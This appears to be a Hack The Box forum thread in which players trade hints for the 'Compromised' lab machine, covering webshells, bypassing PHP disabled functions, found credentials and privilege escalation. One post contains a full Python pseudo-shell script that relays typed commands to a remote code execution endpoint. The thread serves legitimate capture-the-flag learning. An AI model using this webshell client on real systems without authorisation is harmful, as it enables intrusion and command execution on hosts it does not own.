Official Compromised Discussion

12346

Comments

  • @b3nd0 said:

    @LMAY75 Yea I tried my damnedest to not ask for help, but i had to ask taz too. makes me laugh when i imagine the day he must have on here, like a drill instructor walking through a field of shananagans:

    "Code with two hands boy, this isn't a rap concert. Private, why will your exploit not fire?...your magazine is upside down son! How did YOU end up on your own botnet?"

    :lol: :smile: :lol: :love:

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • edited October 1

    Type your comment> @TazWake said:

    @b3nd0 said:

    @LMAY75 Yea I tried my damnedest to not ask for help, but i had to ask taz too. makes me laugh when i imagine the day he must have on here, like a drill instructor walking through a field of shananagans:

    "Code with two hands boy, this isn't a rap concert. Private, why will your exploit not fire?...your magazine is upside down son! How did YOU end up on your own botnet?"

    :lol: :smile: :lol: :love:

    As a JROTC guy I find this especially funny

    LMAY75
    Always happy to help, DM me if you need anything!
    Link to Profile

  • @LMAY75 said:

    Type your comment> @TazWake said:

    @b3nd0 said:

    @LMAY75 Yea I tried my damnedest to not ask for help, but i had to ask taz too. makes me laugh when i imagine the day he must have on here, like a drill instructor walking through a field of shananagans:

    "Code with two hands boy, this isn't a rap concert. Private, why will your exploit not fire?...your magazine is upside down son! How did YOU end up on your own botnet?"

    :lol: :smile: :lol: :love:

    As a JROTC guy I find this especially funny

    To round off the comedy, 15 years ago I was a basic training sergeant/instructor.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • I need a nudge. phpinfo saddened me deeply on my way to foothold and I do not know how to proceed.

    sparrow1

  • @sparrow1 said:

    I need a nudge. phpinfo saddened me deeply on my way to foothold and I do not know how to proceed.

    There is a way to bypass the things which are disabled. Its googleable.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • Type your comment> @TazWake said:

    @LMAY75 said:

    Type your comment> @TazWake said:

    @b3nd0 said:

    @LMAY75 Yea I tried my damnedest to not ask for help, but i had to ask taz too. makes me laugh when i imagine the day he must have on here, like a drill instructor walking through a field of shananagans:

    "Code with two hands boy, this isn't a rap concert. Private, why will your exploit not fire?...your magazine is upside down son! How did YOU end up on your own botnet?"

    :lol: :smile: :lol: :love:

    As a JROTC guy I find this especially funny

    To round off the comedy, 15 years ago I was a basic training sergeant/instructor.

    How did you go from that to infosec

    LMAY75
    Always happy to help, DM me if you need anything!
    Link to Profile

  • @LMAY75 said:

    How did you go from that to infosec

    It was only a posting so after 2 years I returned to my trade.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • Finally got root. This one was really hard to me but mostly because I'm not very good on the vector needed for privesc. BTW, if anyone knows about good resources to work on that, please DM me.

    +1 respect to @TazWake and @c4ph00k for their help! Thx guys!

    Feel free to send me a DM if you need some help. Just remember to tell me what you have already done so I don't spoil anything.

  • Really struggling with the exploit, have the creds already, but can't do anything from there. Anybody can pm or give a little hint?

  • Type your comment> @LegendHacker said:

    Really struggling with the exploit, have the creds already, but can't do anything from there. Anybody can pm or give a little hint?

    This box is marked HARD. The flow seems a bit easy/classic but it cannot work out of the box otherwsie the box would be easy. So you may be onto the right thing but he usual functions and checks you'd expect to use will not work. Find alternative functions or google for alternative functions to what you'd expect to work, but which doesn't work.

    Also, not showing any output doesn't mean it didn't work.

    lebutter
    eCPPT | OSCP

  • The flow is rather classic but the path is tortuous (at least it was for me). I needed hints, thanks @TazWake.
    For those who found @sparkla's script useful, check this one out https://github.com/mxrch/webwrap (a wee bit better).
    My 2cents (everything has been said!):
    Foothold: if you want to get a shell, bypassing the restrictions in place is googleable.
    User1: one function will help you do what you need to do to get access. You can land directly here without the foothold above.
    User2: enum.
    Root: quite a common backdoor.

  • What is wrong with the box rn? It is not curling my links. Not even curl localhost

    Hack The Box

  • Nothing is wrong. It is supposed to be like that.

    sparrow1

  • apart from re**r*ng any other way to do privesc ?

  • @niting3c said:

    apart from re**r*ng any other way to do privesc ?

    Not as far as I am aware.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • edited October 17

    Type your comment> @niting3c said:

    apart from re**r*ng any other way to do privesc ?

    Its rlly not that bad. Basically plug and play with ghidra, wouldnt even consider it reversing.

    LMAY75
    Always happy to help, DM me if you need anything!
    Link to Profile

  • Third time the website "disappears" even though the box is pingable. Even resetting doesn't fix the issue. What's wrong ?

  • FInally I managed to get root.
    Thanks for great machine @D4nch3n. I learned something new especially about php backdoors. Also searching for compromise leftovers was something new for me - guess I wouldn't be a good sysadmin :wink:
    Many thanks @TazWake and @LMAY75 for your great hints along the way.

    sparrow1

  • edited October 22

    Umm, Hey guys just started the box today found the backup and an exploit for "l*** c***" but it requires the user credentials. Can someone help or if i am going down a rabbit hole please alert me!!

    Edit: I got the user name for " l*** c*** "

    image

  • Type your comment> @shubhanshu7 said:

    Umm, Hey guys just started the box today found the backup and an exploit for "l*** c***" but it requires the user credentials. Can someone help or if i am going down a rabbit hole please alert me!!

    You are on the right track , enumerate through the backup.. as other comments have mentioned it is very worthwhile learning grep,find,locate to help with your searching. Another helpful comment was pay attention to dates :)

    Africanhippo

  • Rooted. If you need some help, DM me.

    User:Find correct vuln web to upload webshell and search some creds with webshell.
    Root: think like a "heartbleed" It's not about the heartbleed. Only exploitation type is similar.

  • Finally rooted after a few very long days! Thank you @gunroot and @LMAY75 for the nudges. Some of the tips one here are exactly what you need! Enumeration is a big part to the box. Information for user1 can be found in multiple places.. once of which you have probably used already ;)

    Happy to help nudge if you need help, provide what you have done and where you are up to in a PM.

    Africanhippo

  • Really interesting box.
    I learnt something trying to get a webshell, but its entirely not necessary (and its probably easier not to get a webshell).

    I found it usefull to rewrite what was changed and print it, as i had all the letters right but not the order.

  • I can read files list directories but I am coming empty. I see couple of users that have bash in passwd but I am not finding info to compermise those users. Any hints would be appriciated

    Hack The Box

  • edited November 1

    Real fun box, I got stuck at root, thanks to @LMAY75 for the nudge.
    On a hindsight, it was obvious.

    I loved scripting to own this box, this is my take on the "Not A Reverse Shell", nothing new but since nobody posted something similar (having history, history search and emacs style special keys).

    #!/usr/bin/env python3
    import cmd
    
    
    def execute(line):
        import requests
        target="http://YOURRCE"
        r = requests.get(target, params={"YOURCMDARG":line})
        if r.status_code == 200:
            return r.text
        else:
            return f"{r.text}\r\nnars> ERROR: http response code was {r.status_code}"
    
    class NotAReverseShell(cmd.Cmd):
        prompt="nars> "
    
        def do_help(self, line):
            print("Not A Reverse Shell, a pseudo shell when you cannot have one.")
    
        def default(self, line):
            print(execute(line))
    
        def do_EOF(self, line):
            print()
            return True
    
        def do_exit(self, line):
            return True
    
        def do_quit(self, line):
            return True
    
    if __name__ == "__main__":
        NotAReverseShell().cmdloop()
    

    Beautiful box!

  • Type your comment> @shubhanshu7 said:

    Umm, Hey guys just started the box today found the backup and an exploit for "l*** c***" but it requires the user credentials. Can someone help or if i am going down a rabbit hole please alert me!!

    You are on the right track , enumerate through the backup.. as other comments have mentioned it is very worthwhile learning grep,find,locate to help with your searching. Another helpful comment was pay attention to dates :)

    Thanks man!! was off from htb for quite a time but gonna try it

    image

  • damnnn...... I just don't know at this point. It's been a while I'm stuck on the my*** user and can't move forward. I saw hints pointing to the home dir of the user, but i couldn't find anything too useful. Any hints?

  • @iWillBeFamous said:

    damnnn...... I just don't know at this point. It's been a while I'm stuck on the my*** user and can't move forward. I saw hints pointing to the home dir of the user, but i couldn't find anything too useful. Any hints?

    This wont cheer you up but look closer at the things you think aren't too useful.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • Got root! Thanks @TazWake for hint at user stage.

Sign In to comment.